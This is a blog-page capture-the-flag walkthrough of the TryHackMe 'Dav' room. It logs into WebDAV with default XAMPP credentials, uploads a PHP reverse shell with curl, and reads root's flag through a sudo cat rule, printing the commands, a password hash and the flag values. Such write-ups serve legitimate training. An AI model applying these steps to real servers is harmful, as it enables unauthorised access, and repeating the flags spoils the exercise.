CTF Walk Through - Dav

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

01/11/2024 Shad Hussain Knowledge Views 84 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - Dav - THM


Room Link : https://tryhackme.com/r/room/bsidesgtdav


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.104.43 
FINDING
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
---------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.80.76 
FINDING
+ http://10.10.80.76/index.html (CODE:200|SIZE:11321)                                                                     
+ http://10.10.80.76/server-status (CODE:403|SIZE:299)                                                                    
+ http://10.10.80.76/webdav (CODE:401|SIZE:458)   
---------------------------------------------------------------------------------------------
STEP3
http://10.10.80.76/webdav

FINDING
login popup
NOTE
search in google default webdev login credentials
https://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html

FINDING
user: wampp
pass: xampp
---------------------------------------------------------------------------------------------
STEP4
login to http://10.10.80.76/webdav with credential -- wampp -- xampp
FINDING
http://10.10.80.76/webdav/passwd.dav

wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
---------------------------------------------------------------------------------------------
STEP5
create a php revers shell
curl --user "wampp:xampp" http://10.10.80.76/webdav/ --upload-file phprshell.php -v
open nc listner in new tab
get reverse shell
---------------------------------------------------------------------------------------------
STEP6
ls -la
cd /home
cd merlin
ls -la
cat user.txt
FINDING
449b40fe93f78a938523b7e4dcd66d2a
use https://hashes.com/en/decrypt/hash

449b40fe93f78a938523b7e4dcd66d2a : 1324466367
---------------------------------------------------------------------------------------------
STEP7
sudo -l
FINDING
(ALL) NOPASSWD: /bin/cat
---------------------------------------------------------------------------------------------
STEP8
sudo /bin/cat /root/root.txt
FINDING
101101ddc16b0cdf65ba0b8a7af7afa5
use https://hashes.com/en/decrypt/hash

101101ddc16b0cdf65ba0b8a7af7afa5 : 1330795944
---------------------------------------------------------------------------------------------

	05.11.2024 Gauri singh Readers 95
THE BENEFITS OF LOVING SOMEONE 1. IT MAKES GOOD USE OF THE MANS ERECTION Most men wake up with an erection, i ..... Read all...

	06.11.2024 Shad Hussain Readers 171
CTF Walk Through - OverPass - THM Room Link : https://tryhackme.com/room/overpass STEP1 nmap -p- -sSV 10.10.1 ..... Read all...

	31.10.2024 Shad Hussain Readers 96
CTF Walk Through - Anonforce - THM Rom Link : https://tryhackme.com/r/room/bsidesgtanonforce STEP1 nmap -p- -P ..... Read all...

	31.10.2024 Shad Hussain Readers 131
CTF Walk Through - Thompson - THM Room link : https://tryhackme.com/r/room/bsidesgtthompson STEP1 nmap -p- -P ..... Read all...

	30.10.2024 Shad Hussain Readers 244
CTF Walk Through - Ignite- THM Room Link : https://tryhackme.com/r/room/ignite STEP1 nmap -p- -Pn -A -T4 - ..... Read all...

K	28.10.2024 Kajal sah Readers 319
एक अंग सबसे महत्वपूर्ण एवं अनिवार्य कौशल संचार कौशल है। जिसके माध्यम से आप पूरी दुनिया ..... Read all...

	28.10.2024 Shad Hussain Readers 295
CTF Walk Through - Library - THM Room Link : https://tryhackme.com/r/room/bsidesgtlibrary STEP1 nmap -p- -Pn ..... Read all...

	27.10.2024 Shad Hussain Readers 232
CTF Walk Through - Bounty Hacker - THM Room Link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. ..... Read all...

	26.10.2024 Shad Hussain Readers 291
CTF Walk Through - Easy Peasy - THM Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles